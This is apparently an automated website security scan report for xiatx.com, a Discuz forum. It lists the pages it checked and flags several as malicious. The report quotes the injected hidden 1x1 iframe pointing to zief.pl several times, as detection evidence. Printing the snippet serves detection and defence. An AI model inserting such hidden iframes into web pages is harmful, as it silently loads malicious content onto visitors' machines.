Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xiatx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.xiatx.com/ | 200 OK Content-Length: 78900 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4078 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502704|9f653765c32b741de0531c30d7bd57d5|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/common.js?cVZ | 200 OK Content-Length: 69459 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/static/js/portal.js?cVZ | 200 OK Content-Length: 11314 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/static/js/logging.js?cVZ | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://tcss.qq.com/ping.js?v=1VERHASH | 200 OK Content-Length: 8909 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/home.php?mod=misc&ac=sendmail&rand=1412502704 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/member.php?mod=register | 200 OK Content-Length: 20130 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4074 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502716|b6ba3f84c7576718a08de46447fd07b8|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/register.js?cVZ | 200 OK Content-Length: 10775 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/home.php?mod=misc&ac=sendmail&rand=1412502716 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.xiatx.com/connect.php?mod=login&op=init&referer=http%3A%2F%2Fwww.xiatx.com%2F.%2F&statfrom=login_simple | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 09:52:00 GMT Location: https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310611889&redirect_uri=http%3A%2F%2Fwww.xiatx.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.xiatx.com%252F.%252F&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2Cadd_share%2Cadd_t%2Cadd_pic_t%2Cget_repost_list Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=gbk Set-Cookie: VRl7_2132_saltkey=CXffY7u1; expires=Tue, 04-Nov-2014 09:52:00 GMT; path=/; httponly Set-Cookie: VRl7_2132_lastvisit=1412499120; expires=Tue, 04-Nov-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_sid=Yt7P4g; expires=Mon, 06-Oct-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_lastact=1412502720%09connect.php%09login; expires=Mon, 06-Oct-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_stats_qc_reg=deleted; expires=Sat, 05-Oct-2013 09:51:59 GMT; path=/ Set-Cookie: VRl7_2132_cloudstatpost=deleted; expires=Sat, 05-Oct-2013 09:51:59 GMT; path=/ Set-Cookie: VRl7_2132_con_request_uri=http%3A%2F%2Fwww.xiatx.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.xiatx.com%252F.%252F; path=/ X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 09:59:54 GMT Location: http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list Server: tws Content-Length: 0 Content-Type: text/html | clean |
http://openapi.qzone.qq.com/oauth/show?which=login&display=pc&response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | 200 OK Content-Length: 7473 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.xiatx.com ...[1851 bytes skipped]... r.userAgent].join("|_|")); var src = 'http://badjs.qq.com/cgi-bin/js_report?'+ [bid,mid,msg].join("&"); errorTransport = new Image; errorTransport.onerror = errorTransport.onload = function(){ errorTransport = errorTransport.onerror = errorTransport.onload = null ; }; errorTransport.src = src; false; Q.crtDomain = 'http://www.xiatx.com/'; Q.agree = function(){ window.isAgreed = true; }; Q.logout = function(){ window.isLogouted = true; }; Q.isNeedLogin = true; Q.getParameter = function getParameter(name) { var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r); return decodeURIComponent(!m ? "" : m[2]); }; Q.ptlogin2 = function(){ ...[1780 bytes skipped]... | ||
http://qzonestyle.gtimg.cn/c/=/open/connect/widget/pc/login/pt_adapt.js,qlogin_v2.js?v=20140527 | 200 OK Content-Length: 24401 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.xiatx.com/forum.php | 200 OK Content-Length: 63233 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4064 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502724|55ef8b52e72ab3e21dc4f9abba30665a|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/forum.js?cVZ | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xiatx.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xiatx.com
Referer: http://www.google.com/search?q=xiatx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.